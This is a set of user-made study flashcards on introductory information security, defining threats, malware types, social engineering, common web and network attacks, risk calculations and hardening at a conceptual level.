The flashcards below were created by user
on FreezingBlue Flashcards.
Name the number one type of internet fraud.
Nigerian 419 advanced fee fraud
Name the difficulites in Defending Against Attacks.
- -Universally connected devices
- -Increased speed of attacks
- -Greater sophistication of attacks
- -Availability and simplicity of attack tools
- -Faster detection of vulnerabilities
What is Information Security?
Guarding digitally formatted information; it provides value to people and organizations
Name the 3 Types of information protection and describe them.
1. Confidentiality- only approved individuals may access information
2. Integrity- information is correct and unaltered
3. Availability- information is accessible to authorized users
What are the protections implemented to secure information?
Authentication- indiviual is who they claim to be
Authorization- grant ability to access information
Accounting- provides tracking of events
Terminology- What is an ASSET?
Item of value
Terminology- What is a THREAT?
Actions or events that have potential to cause harm
Terminology- What is a THREAT AGENT?
Person or element with power to carry out a threat
Terminology- What is a VULNERABILITY?
Flaw or weakness- threat agent can bypass security
Terminology- What a RISK?
- Likelihood that threat agent will exploit vulnerability.
- Cannot be eliminated entirely and some degree of risk must be assumed.
What are the options to deal with risk?
Accept- realize there is chance of loss.
Diminish- take precautions, most IS risks should be
Transfer Risk- example: purchanse insurance
What are some potential cyberterrorism targets?
Banking, Military, Energy (power plants), Water Systems
Suppose the author of an online banking software system has programmed in a secret feature so that program emails him the account information for any account whose balance has just gone over $10,000. What kind of attack is this and what are some of its risks?
Trojan horse, since it has a hidden malicious action that goes with a useful service.
What is a Hacker?
Person who uses computer skills to attack computers. Term not common in sercurity community.
What is the difference between White Hat Hackers and Black Hat Hackers?
White hat hackers goal is to expose security flaws, not to steal or corrupt data. Black hat hackers goal is malicious and destructive.
What is a Script Kiddie and their skill level?
A unskilled user whose goal is to break into computers to create damage. They download automated hacking software (scripts). 40% attacks by script kiddies.
What is a Computer Spy?
Person hired to break into a computer to steal information. Hired to attack a specific computer or system containing sensitive information. Possess excellent computer skills to attack and cover their tracks.
What are Insiders and give examples?
- Employees, contractors, and business partners. 48% of breaches attributed to insiders.
- Examples: Government employee planted malicious coding script. Stock trader concealed losses through fake transactions.
What are Cybercriminals?
- Network of attackers, identity thieves, spammers, financial fraudsters.
- They are more motivated, better funded, take more risk.
What are Cyberterrorists?
- Criminals with Ideological Motivation; attacking because of their principles and beliefs.
- Goals: Deface electronic information and spread misinformation and propaganda. Deny Service to legitimate users. Commit unauthorized intrusions.
Name the 5 Steps of an Attack and describe them?
- 1. Probe for Information- such as type of hardware or software used.
- 2. Penetrate Any Defenses- launch the attack
- 3. Modify Security Settings- allows attacker to reenter compromised system easily
- 4. Circulate to Other Systems- same tools directed toward other systems
- 5. Paralyze Networks and Devices
What are the Fundamental Security Principles for defenses?
- IS must be created in layers. Single defense mechanism may be easy to break, but unlikely attacker can break through all defense layers.
- It provides most comprehensive protection.
- Limiting access to information reduces the threat against it. Only those who must use the data are granted access.
- Methods of Limiting access: -Technology- file permissions
- -Procedural- prohibiting document removeal from premises
Closely related to Layering, layers must be diverse. If attackers penetrate one layer, same techniques unsuccessful in breaking through other layers.
- Obscuring inside details to outsiders.
- Example: Not revealing details such as type of computer, OS version, brand of software used.
Secure system should be simple for insiders to understand and use. Simple from the inside and complex from the outside.
Name the goals of IS.
- Prevent data theft
- Thwart identity theft
- Avoid legal consequences of not securing info
- Maintain productivity
- Foil cyberterrorism
What does Malicious Software do?
Enters a computer system without owner's knowledge. It's objectives are infecting systems, concealing its purpose, making profit.
What is a Virus?
Malicious computer code that reproduces itself on the same computer.
What are some examples of virus actions?
- -cause a computer to repeatedly crash
- -erase files from or reformat hard drive
- -turn off computer's security settings
Name the 3 virus infection methods and describe them.
Appender Infection- virus appends itself to end of a file, moves first three bytes of o.g. file to virus code and replaces them with a jump instruction pointing to the virus code.
Swiss Cheese Infection- viruses inject themselves into executable code, o.g. code transferred and stored inside virus code and host code executes properly after the infection.
Split Infection- virus splits into several parts, parts placed at random positions in host program, head of virus code starts at beginning of file and gives control to next piece of virus code.
Describe virus' characteristics.
- -cannot automatically spread to another computer, relies on user action to spread
- -attached to files
- -spread by transferring infected files
Name and describe the 5 types of computer viruses.
- -Program- infects executable files
- -Macro- executes a script
- -Resident- virus infects files opened by user or OS
- -Boot virus- infects the Master Boot Record
- -Companion virus- adds malicious copycat program to OS
What is a Worm?
- Malicious program, exploits application or OS vulnerability. Sends copies of itself to other network devices.
- Worms may consume resources or leave behind a payload to harm infected systems.
Describe Worm Development.
- 1. Identify vulnerability still unpatched
- 2. Write code for exploit vulnerability, generation of targert list, install/execute payload, querying/reporting if a host is infected.
- 3. Initial deployment on botnet
How does a Worm spread?
Worms use a network to travel from one computer to another.
What is a Trojan?
Program that does something other than advertised. Typically executable programs that contain hidden code that launches an attack.
What is are Rootkits?
- Software tools used by an attacker to hide actions or presence of other types of malicious software.
- Hide or remove traces of log-in records, log entries.
- May alter or replace OS files with modified versions, specifically designed to ignore malicious activity.
How do you detect a Rootkit?
- Can be detected using programs that compare file contents with o.g. files.
- Rootkits that operate at OS's lower levels may be difficult to detect.
- Removal of rootkit can be difficult: it must be erased, o.g. OS files must be restored, have to reformat hard drive and reinstall OS
What is a Logic Bomb?
Computer code that lies dormant. Triggered by a specific logical event, then performs malicious activities. It is difficult to detect before its triggered.
What is a Backdoor?
Software code that circumvents normal sercurity to give program access. Its a common practice by developers, intent is to remove backdoors in final application.
Name malware designed to profit attackers.
What is a Botnet?
- Computer is infected with program that allows it to be remotely controlled by attacker. Often payload of Trojans, worms, and viruses.
- Infected computer called a zombie.
- Groups of zombie computers together called botnet.
What are the Botnets' advantages for attackers?
- Operate in the background wiht no visible evidenve of existence.
- It provides means for concealing actions of attacker.
- It can remain active for years.
What is Spyware?
Software that gathers information without user consent, ususally for advertising, collecting personal information, changing computer configurations.
What are Spyware's negative effects?
- Slows computer performance
- Causes systme instability
- May install new browser menus or toolbars
- May place new shortcuts
- May hijack homepage
- Causes increased pop-ups
What is Adware?
Program that delivers advertising content in a manner unexpected and unwanted by user. May open new browser windowns randomly and also perform tracking of online activities.
What are Keyloggers?
Program that captures user's keystrokes. Information later retrieved by attacker. Attacker searches for useful information: passwords, credit card numbers, personal information.
What are Social Engineering Attacks? What are some types?
- Directly gathering information from individuals, relies on trusting nature of individuals. Persuade the victim to provide information or take action.
- Types: phishing, impersonation, dumpster diving, tailgating.
What is Phishing?
- Type of Social Engineering Attack.
- Sending an email claiming to be from legitimate source and tries to trick user into giving private information.
What are variations of Phishing and describe them?
- -Pharming- automatically redirects user to fraudulent website.
- -Spear phishing- email messages target specific users.
- -Whaling- going after the "big fish", targeting wealthy individuals.
- -Vishing- voice phishing, attacker calls victim with recorded "bank" message, victim calls back number and enters private information
What are ways to recognize phishing messages?
- Deceptive web links, @sign in middle of address
- Variations of legitimate addresses
- Presence of vendor logos that look legitimate
- Fake sender's address
- Urgent request
What is Spam?
Unsolicited email, primary vehicles for distribution of malware. Sending spam is a lucrative business.
What is Spim?
Spam that targets IM users.
What are some Spammer Techniques and describe them?
- GIF Layering- image spam divided into multiple images, layers make up one complete legible message
- Word Splitting- horizontally separating words, can still be read by human eye
- Geometric Variance- uses speckling and different colors so no two emails appear to be the same
What are Hoaxes?
False warning or claim, may be first step in an attack.
What is Dumpster Diving?
Digging through trash to find useful info.
What is Tailgating?
Following behind an authorized individual through an access door.
What are some methods of Tailgating?
- Tailgater calls "please hold the door."
- Waits outside door and enters when authorized employee leaves.
- Employee conspires with unauthorized person to walk together through open door.
What is Shoulder Surfing?
Casually observing user entering keypad code.
What are Zero Day attacks?
- Attacks that targer applications
- Exploit previously unknown vulnerabilities
- Victims have no time to prepare or defend
What are the two approachs to securing Web applications?
- Hardening the web server
- Protecting the network
What are common web app attacks?
- Cross-site scripting
- SQL injection
- XML injection
- Command injection/ directory traversal
What is Cross Site Scripting (XSS)?
- Injecting scripts into a web application server, directs attacks at clients.
- When victtim visits injected web site malicious instructions sent to victim's browser and it cannot distingusih between valid and malicious code.
What is SQL Injection?
Targets SQL servers by injecting commands. SQL used to manipulate data stored in relational database.
What is XML Injection?
- Markup language, method for adding annotations to text,
- HTML- uses tags surrounded by brackets, instructs browser to display text in specific format.
- XML- carries data instead of indicating how to display it, no predined set of tags
Describe a XML attack and Xpath injection?
XML attack similar to SQL injection attack. Attacker discovers web site that does not filter user data. Injects XML tags and data into the database.
Xpaht injection- specific type of XML injection attack. Attemps to exploit XML Path Language queries.
What is Command Injection/Directory Traversal attacks?
- Command Injection attack- attacker enters command to execute on a server
- Directory Traversal attack- takes advantage of software vulnerability, attacker moves from root directory to restricted directories
Web application attacks are server side or client side attacks?
Server Side attacks
What is a Drive-by Download?
- Client computer compromised simply by viewing a web page. Attackers inject content into vulnerable web server and gain access to server's OS.
- Attackers craft a zero pixel frame to avoid visual detection.
- Embed and HTML document inside main document.
- Client's browser downloads malicious script.
- Instructs computer to download malware.
What is a Header Manipulation? Examples?
- HTTP header contains fields that characterize data being transmitted.
- Headers can originate from a web browser; browsers do not normally allow this, attacker's short program can allow modification.
- EX: referer and Accept language
Describe Referer and Accept Language.
- Referer field indicates site that generated the web page: attacker can modify this field to hide fact it came from another site; modified web page hosted from attacker's computer
- Accept Language: some web apps pass contents of this field directly to database; attacker could inject SQL command by modifying this header
Name and describe the types of Cookies.
- First-party cookie: created by web site user is currently visiting
- Third-party cookie: site advertisers place a cookie to record user preferences
- Session cookie: stored in RAM and expires when browser is closed
- Persistent cookie: recorded on computer's hard drive, does not expire when browser closes
- Secure cookie: used only when browser visits server over secure connection, always encrypted
- Flash cookie: uses more memory than traditional cookie, cannot be deleted through browser configuration settings
Who/What can read Cookies?
Only the web site that created it
What security/privacy risks do cookies pose?
- may be stolen and used to impersonate user
- used to tailoer advertising
- can be exploited by attackers
What is Session hijacking?
- Client side attack
- Attacker attempts to impersonate user by stealing or guesing session token
What are Malicious add-ons?
- Client Side attack
- Browser extensions provide multimedia or interactive web content
- active X add-ons have several security concerns
What is a Buffer Overflow attack?
- Client side attack
- Process attempts to store data in RAM beyond boundaries of fixed length storage buffer
- Data overflows into adjacent memory locations
- May cause computer to stop functioning
- Attacker can change "return address", redirects to memory address containing malware code
What is a Denial of Service attack (DoS)? Name 3 types.
- Network Attack
- Attempts to prevent system from performing norma functions.
- Ping Flood attack, Smurf attack, SYN Flood attack
Describe a Ping Flood attack.
Ping utility used to send lare number of echo request messages. Overwhelms web server.
Describe a Smurf attack.
Ping request with origination address changed. Appears as if targer computer is asking for response from all computers on the network.
Describe a SYN Flood attack.
Takes advantage of procedures for establishing a connection.
What is a Distributed Denial of Service (DDoS)?
Attacker uses many zombie computers in a botner to flood a device with requests. Virtually impossible to identity and block source of attack.
What is Man-in-the-Middle?
- Interception of legitimate communication.
- Forging a fictitious response to the sender.
- Passive attack records transmitted data.
- Active attack alters contents of transmission before sending to recipient.
What are Replay Attacks?
- Similar to passive man in the middle attack
- Attacker makes copy of transmission, uses coy at a later time. EX- capturing log on credentials
- More sophisticated replay attacks- attacker captures network device's message to server; later sends original, valid message to server; establishes trust relationship between attacker and server
What is ARP Poisoning?
Attacker modifies MAC address in ARP cache to point to different computer
What is DNS poisoning?
- Domain Name System is current basis for name resolution to IP address.
- DNS poisoning substitues DNS addresses to redirect computer to another device.
What are the two locations for DNS poisoning?
- Local Host Table
- External DNS server
What is Privilege escalation? (attacks on access rights)
- Exploiting software vulnerability to gain access to restricted data.
- Lower privilege user accesses functions restricted to higher privilege users.
- User with restricted privilege accesses different restricted privilege of a similiar user.
What is Transitive Access? (attacks on access rights)
- Attack involving a third party to gain access rights.
- Has to do with whose credentials should be used when accessing services, different users have different access rights.
What is Vulnerability Appraisal?
- Determine current weaknesses, snapshot of current organization security
- Every asset should be viewed in light of each threat
What is Single Loss Expectancy (SLE)?
- Expected monetary loss each time a risk occurs.
- Calculated by multiplying the Asset Value by Exposure Factor.
- EF- % of asset value likely to be destroyed by a particular risk
What is Annulized Loss Expectancy (ALE)?
- Expected monetary loss over a one year period.
- Multiply SLE by annualized rate of occurence.
- Annualized rate of occurence- probability that a risk will occur in a particular year.
What are the Software Development Assessment techniques?
- Review architectural design in requirement phase.
- Conduct design reviews, consider including a security consultant.
- Conduct code review during implementation phase.
- Correct bugs during verification phase.
- Create and distribute security updates as necessary.
What do IP addresses do?
Uniquely identify each network device.
What is a Port Number and its length? What are the 3 types of port numbers?
- Unique identifier for applications and services.
- 16 bits in length.
- Well-known port numbers- reserved for most univeral applications
- Registered port numbers- other applications not as widely used
- Dynamic and Private port numbers- available for any application to use
What does Port Scanner software do?
Searches system for port vulnerabilities. Used to determine port state- open, closed, or blocked
What are Protocol Analyzers?
Hardware or software that captures packets to decode and analyze contents, a.k.a. Sniffers.
What are some common uses for protocol analyzers?
- Used by network administrators for troubleshooting.
- Characterizing network traffic.
- Security analysis.
What is the problem with assessment tools?
No standard for collecting, analyzing, reporting vulnerabilities.
What is OVAL?
- Open Vulnerability and Assessment Language.
- Designed to promote open and publicly available security content.
- Standardizes information transfer across different security tools and devices.
What is a Honeypot?
- Computer protected by minimal security.
- Intentionally configured with vulnerabilities.
- Goal- trick attackers into revealing their techniques.
What is a Honeynet?
Network set up with one or more honeypots.
Name differences between Vulnerability Scanning and Penetration Testing.
- Vulnerability Scanning: automated software searches a system for known security weaknessess.
- Creates report of potential exposures.
- Does not interfere with normal network operations.
- Penetration Testing: designed to exploit system weaknesses.
- Relies on tester's skill, knowledge, cunning.
- Usually conducted by independent contractor
- Conducted outside the security perimeter.
What is a Black Box, White Box, Gray Box Test?
- Black Box: tester has no prior knowledge of network infrastructure
- White Box: tester has in-depth knowledge of network and systems being tested
- Gray Box: some limited info has been provided to the tester
What is purpose of Hardening?
Eliminate as many security risks as possible.
What are system hardening techniques?
- Protecting accounts with passwords.
- Disabling unnecessary accounts.
- Disabling unnecessary services.
- Protecting management interfaces and applications.
What are standard techniques for mitigating and deterring attacks?
- Creating a security posture.
- Configuring controls.